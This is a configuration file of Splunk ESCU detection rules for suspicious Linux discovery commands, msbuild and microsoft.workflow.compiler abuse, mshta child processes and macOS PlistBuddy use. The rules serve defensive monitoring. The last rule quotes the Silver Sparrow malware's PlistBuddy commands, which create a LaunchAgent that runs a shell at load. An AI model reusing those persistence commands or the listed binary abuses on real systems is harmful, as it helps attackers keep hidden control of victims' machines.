action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.004"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search, detects execution of suspicious bash commands from various commonly leveraged bash scripts like (AutoSUID, LinEnum, LinPeas) to perform discovery of possible paths of privilege execution, password files, vulnerable directories, executables and file permissions on a Linux host.\ The search logic specifically looks for high number of distinct commands run in a short period of time. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Unless an administrator is using these commands to troubleshoot or audit a system, the execution of these commands should be monitored. 
action.escu.creation_date = 2021-12-06 action.escu.modification_date = 2021-12-06 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Linux Discovery Commands - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Post-Exploitation"] action.risk = 1 action.risk.param._risk_message = Suspicious Linux Discovery Commands detected on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 81}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious Linux Discovery Commands - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Post-Exploitation"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.004"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search, detects execution of suspicious bash commands from various commonly leveraged bash scripts like (AutoSUID, LinEnum, LinPeas) to perform discovery of possible paths of privilege execution, password files, vulnerable directories, executables and file permissions on a Linux host.\ The search logic specifically looks for high number of distinct commands run in a short period of time. 
action.notable.param.rule_title = Suspicious Linux Discovery Commands action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process) values(Processes.process_name) values(Processes.parent_process_name) dc(Processes.process) as distinct_commands dc(Processes.process_name) as distinct_process_names min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where [|inputlookup linux_tool_discovery_process.csv | rename process as Processes.process |table Processes.process] by _time span=5m Processes.user Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| where distinct_commands > 40 AND distinct_process_names > 3| `suspicious_linux_discovery_commands_filter` [ESCU - Suspicious microsoft workflow compiler rename - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a renamed instance of microsoft.workflow.compiler.exe. Microsoft.workflow.compiler.exe is natively found in C:\Windows\Microsoft.NET\Framework64\v4.0.30319 and is rarely utilized. When investigating, identify the executed code on disk and review. A spawned child process from microsoft.workflow.compiler.exe is uncommon. In any instance, microsoft.workflow.compiler.exe spawning from an Office product or any living off the land binary is highly suspect. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036", "T1127", "T1036.003"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies a renamed instance of microsoft.workflow.compiler.exe. 
Microsoft.workflow.compiler.exe is natively found in C:\Windows\Microsoft.NET\Framework64\v4.0.30319 and is rarely utilized. When investigating, identify the executed code on disk and review. A spawned child process from microsoft.workflow.compiler.exe is uncommon. In any instance, microsoft.workflow.compiler.exe spawning from an Office product or any living off the land binary is highly suspect. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although unlikely, some legitimate applications may use a moved copy of microsoft.workflow.compiler.exe, triggering a false positive. 
action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious microsoft workflow compiler rename - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Masquerading - Rename System Utilities", "Living Off The Land", "Cobalt Strike", "Trusted Developer Utilities Proxy Execution", "BlackByte Ransomware", "Graceful Wipe Out Attack"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious microsoft workflow compiler rename - Rule action.correlationsearch.annotations = {"analytic_story": ["Masquerading - Rename System Utilities", "Living Off The Land", "Cobalt Strike", "Trusted Developer Utilities Proxy Execution", "BlackByte Ransomware", "Graceful Wipe Out Attack"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036", "T1127", "T1036.003"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name!=microsoft.workflow.compiler.exe AND Processes.original_file_name=Microsoft.Workflow.Compiler.exe by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.original_file_name | `drop_dm_object_name(Processes)` | 
`security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_microsoft_workflow_compiler_rename_filter` [ESCU - Suspicious microsoft workflow compiler usage - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies microsoft.workflow.compiler.exe usage. microsoft.workflow.compiler.exe is natively found in C:\Windows\Microsoft.NET\Framework64\v4.0.30319 and is rarely utilized. When investigating, identify the executed code on disk and review. It is not a commonly used process by many applications. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1127"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies microsoft.workflow.compiler.exe usage. microsoft.workflow.compiler.exe is natively found in C:\Windows\Microsoft.NET\Framework64\v4.0.30319 and is rarely utilized. When investigating, identify the executed code on disk and review. It is not a commonly used process by many applications. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although unlikely, limited instances have been identified coming from native Microsoft utilities similar to SCCM. 
action.escu.creation_date = 2021-01-12 action.escu.modification_date = 2021-01-12 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious microsoft workflow compiler usage - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Trusted Developer Utilities Proxy Execution", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = Suspicious microsoft.workflow.compiler.exe process ran on $dest$ by $user$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 35}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 35}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious microsoft workflow compiler usage - Rule action.correlationsearch.annotations = {"analytic_story": ["Trusted Developer Utilities Proxy Execution", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1127"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies microsoft.workflow.compiler.exe usage. microsoft.workflow.compiler.exe is natively found in C:\Windows\Microsoft.NET\Framework64\v4.0.30319 and is rarely utilized. When investigating, identify the executed code on disk and review. It is not a commonly used process by many applications. 
action.notable.param.rule_title = Suspicious microsoft workflow compiler usage
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_microsoftworkflowcompiler` by Processes.dest Processes.parent_process Processes.process_name Processes.original_file_name Processes.process Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_microsoft_workflow_compiler_usage_filter`

[ESCU - Suspicious msbuild path - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies msbuild.exe executing from a non-standard path. Msbuild.exe is natively found in C:\Windows\Microsoft.NET\Framework\v4.0.30319 and C:\Windows\Microsoft.NET\Framework64\v4.0.30319. Instances of Visual Studio will run a copy of msbuild.exe. A moved instance of MSBuild is suspicious, however there are instances of build applications that will move or use a copy of MSBuild.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036", "T1127", "T1036.003", "T1127.001"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies msbuild.exe executing from a non-standard path. Msbuild.exe is natively found in C:\Windows\Microsoft.NET\Framework\v4.0.30319 and C:\Windows\Microsoft.NET\Framework64\v4.0.30319. Instances of Visual Studio will run a copy of msbuild.exe. A moved instance of MSBuild is suspicious, however there are instances of build applications that will move or use a copy of MSBuild.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Some legitimate applications may use a moved copy of msbuild.exe, triggering a false positive. Baselining of MSBuild.exe usage is recommended to better understand its path usage. Visual Studio runs an instance out of a path that will need to be filtered on.
action.escu.creation_date = 2023-07-10
action.escu.modification_date = 2023-07-10
action.escu.confidence = high
action.escu.full_search_name = ESCU - Suspicious msbuild path - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Trusted Developer Utilities Proxy Execution MSBuild", "Masquerading - Rename System Utilities", "Living Off The Land", "Cobalt Strike", "BlackByte Ransomware", "Graceful Wipe Out Attack"]
action.risk = 1
action.risk.param._risk_message = Msbuild.exe ran from an uncommon path on $dest$ executed by $user$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Suspicious msbuild path - Rule
action.correlationsearch.annotations = {"analytic_story": ["Trusted Developer Utilities Proxy Execution MSBuild", "Masquerading - Rename System Utilities", "Living Off The Land", "Cobalt Strike", "BlackByte Ransomware", "Graceful Wipe Out Attack"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036", "T1127", "T1036.003", "T1127.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies msbuild.exe executing from a non-standard path. Msbuild.exe is natively found in C:\Windows\Microsoft.NET\Framework\v4.0.30319 and C:\Windows\Microsoft.NET\Framework64\v4.0.30319. Instances of Visual Studio will run a copy of msbuild.exe. A moved instance of MSBuild is suspicious, however there are instances of build applications that will move or use a copy of MSBuild.
action.notable.param.rule_title = Suspicious msbuild path
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count values(Processes.process_name) as process_name values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_msbuild` AND (Processes.process_path!=*\\framework*\\v*\\*) by Processes.dest Processes.original_file_name Processes.parent_process Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_msbuild_path_filter`

[ESCU - Suspicious MSBuild Rename - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies renamed instances of msbuild.exe executing. Msbuild.exe is natively found in C:\Windows\Microsoft.NET\Framework\v4.0.30319 and C:\Windows\Microsoft.NET\Framework64\v4.0.30319. During investigation, identify the code executed and what is executing a renamed instance of MSBuild.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036", "T1127", "T1036.003", "T1127.001"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies renamed instances of msbuild.exe executing. Msbuild.exe is natively found in C:\Windows\Microsoft.NET\Framework\v4.0.30319 and C:\Windows\Microsoft.NET\Framework64\v4.0.30319. During investigation, identify the code executed and what is executing a renamed instance of MSBuild.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Although unlikely, some legitimate applications may use a moved copy of msbuild, triggering a false positive.
action.escu.creation_date = 2023-11-07
action.escu.modification_date = 2023-11-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - Suspicious MSBuild Rename - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Trusted Developer Utilities Proxy Execution MSBuild", "Masquerading - Rename System Utilities", "Living Off The Land", "Cobalt Strike", "BlackByte Ransomware", "Graceful Wipe Out Attack"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Suspicious MSBuild Rename - Rule
action.correlationsearch.annotations = {"analytic_story": ["Trusted Developer Utilities Proxy Execution MSBuild", "Masquerading - Rename System Utilities", "Living Off The Land", "Cobalt Strike", "BlackByte Ransomware", "Graceful Wipe Out Attack"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036", "T1127", "T1036.003", "T1127.001"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name!=msbuild.exe AND Processes.original_file_name=MSBuild.exe by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_msbuild_rename_filter`

[ESCU - Suspicious MSBuild Spawn - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies wmiprvse.exe spawning msbuild.exe. This behavior is indicative of a COM object being utilized to spawn msbuild from wmiprvse.exe. It is common for MSBuild.exe to be spawned from devenv.exe while using Visual Studio. In this instance, there will be command line arguments and file paths. In a malicious instance, MSBuild.exe will spawn from non-standard processes and have no command line arguments. For example, MSBuild.exe spawning from explorer.exe, powershell.exe is far less common and should be investigated.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1127", "T1127.001"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies wmiprvse.exe spawning msbuild.exe. This behavior is indicative of a COM object being utilized to spawn msbuild from wmiprvse.exe. It is common for MSBuild.exe to be spawned from devenv.exe while using Visual Studio. In this instance, there will be command line arguments and file paths. In a malicious instance, MSBuild.exe will spawn from non-standard processes and have no command line arguments. For example, MSBuild.exe spawning from explorer.exe, powershell.exe is far less common and should be investigated.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Although unlikely, some legitimate applications may exhibit this behavior, triggering a false positive.
action.escu.creation_date = 2021-01-12
action.escu.modification_date = 2021-01-12
action.escu.confidence = high
action.escu.full_search_name = ESCU - Suspicious MSBuild Spawn - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Trusted Developer Utilities Proxy Execution MSBuild", "Living Off The Land"]
action.risk = 1
action.risk.param._risk_message = Suspicious msbuild.exe process executed on $dest$ by $user$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 42}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 42}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Suspicious MSBuild Spawn - Rule
action.correlationsearch.annotations = {"analytic_story": ["Trusted Developer Utilities Proxy Execution MSBuild", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1127", "T1127.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies wmiprvse.exe spawning msbuild.exe. This behavior is indicative of a COM object being utilized to spawn msbuild from wmiprvse.exe. It is common for MSBuild.exe to be spawned from devenv.exe while using Visual Studio. In this instance, there will be command line arguments and file paths. In a malicious instance, MSBuild.exe will spawn from non-standard processes and have no command line arguments. For example, MSBuild.exe spawning from explorer.exe, powershell.exe is far less common and should be investigated.
action.notable.param.rule_title = Suspicious MSBuild Spawn
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count values(Processes.process_name) as process_name values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=wmiprvse.exe AND `process_msbuild` by Processes.dest Processes.parent_process Processes.original_file_name Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_msbuild_spawn_filter`

[ESCU - Suspicious mshta child process - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies child processes spawning from "mshta.exe". The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, parent process "mshta.exe" and its child process.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.005"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies child processes spawning from "mshta.exe". The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, parent process "mshta.exe" and its child process.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Although unlikely, some legitimate applications may exhibit this behavior, triggering a false positive.
action.escu.creation_date = 2024-01-01
action.escu.modification_date = 2024-01-01
action.escu.confidence = high
action.escu.full_search_name = ESCU - Suspicious mshta child process - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Suspicious MSHTA Activity", "Living Off The Land"]
action.risk = 1
action.risk.param._risk_message = suspicious mshta child process detected on host $dest$ by user $user$.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 40}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 40}, {"threat_object_field": "process_name", "threat_object_type": "process"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Suspicious mshta child process - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious MSHTA Activity", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 80, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.005"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies child processes spawning from "mshta.exe". The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, parent process "mshta.exe" and its child process.
action.notable.param.rule_title = Suspicious mshta child process
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count values(Processes.process_name) as process_name values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=mshta.exe AND (Processes.process_name=powershell.exe OR Processes.process_name=colorcpl.exe OR Processes.process_name=msbuild.exe OR Processes.process_name=microsoft.workflow.compiler.exe OR Processes.process_name=searchprotocolhost.exe OR Processes.process_name=scrcons.exe OR Processes.process_name=cscript.exe OR Processes.process_name=wscript.exe OR Processes.process_name=cmd.exe) by Processes.dest Processes.parent_process Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_mshta_child_process_filter`

[ESCU - Suspicious mshta spawn - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies wmiprvse.exe spawning mshta.exe. This behavior is indicative of a DCOM object being utilized to spawn mshta from wmiprvse.exe or svchost.exe. In this instance, adversaries may use LethalHTA that will spawn mshta.exe from svchost.exe.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.005"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies wmiprvse.exe spawning mshta.exe. This behavior is indicative of a DCOM object being utilized to spawn mshta from wmiprvse.exe or svchost.exe. In this instance, adversaries may use LethalHTA that will spawn mshta.exe from svchost.exe.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Although unlikely, some legitimate applications may exhibit this behavior, triggering a false positive.
action.escu.creation_date = 2021-01-20
action.escu.modification_date = 2021-01-20
action.escu.confidence = high
action.escu.full_search_name = ESCU - Suspicious mshta spawn - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Suspicious MSHTA Activity", "Living Off The Land"]
action.risk = 1
action.risk.param._risk_message = mshta.exe spawned by wmiprvse.exe on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 42}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Suspicious mshta spawn - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious MSHTA Activity", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.005"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies wmiprvse.exe spawning mshta.exe. This behavior is indicative of a DCOM object being utilized to spawn mshta from wmiprvse.exe or svchost.exe. In this instance, adversaries may use LethalHTA that will spawn mshta.exe from svchost.exe.
action.notable.param.rule_title = Suspicious mshta spawn
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count values(Processes.process_name) as process_name values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name=svchost.exe OR Processes.parent_process_name=wmiprvse.exe) AND `process_mshta` by Processes.dest Processes.parent_process Processes.user Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_mshta_spawn_filter`

[ESCU - Suspicious PlistBuddy Usage - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic identifies the use of a native MacOS utility, PlistBuddy, creating or modifying a property list (.plist) file. In the instance of Silver Sparrow, the following commands were executed:\
- PlistBuddy -c "Add :Label string init_verx" ~/Library/Launchagents/init_verx.plist \
- PlistBuddy -c "Add :RunAtLoad bool true" ~/Library/Launchagents/init_verx.plist \
- PlistBuddy -c "Add :StartInterval integer 3600" ~/Library/Launchagents/init_verx.plist \
- PlistBuddy -c "Add :ProgramArguments array" ~/Library/Launchagents/init_verx.plist \
- PlistBuddy -c "Add :ProgramArguments:0 string /bin/sh" ~/Library/Launchagents/init_verx.plist \
- PlistBuddy -c "Add :ProgramArguments:1 string -c" ~/Library/Launchagents/init_verx.plist \
Upon triage, capture the property list file being written to disk and review for further indicators. Contain the endpoint and triage further.
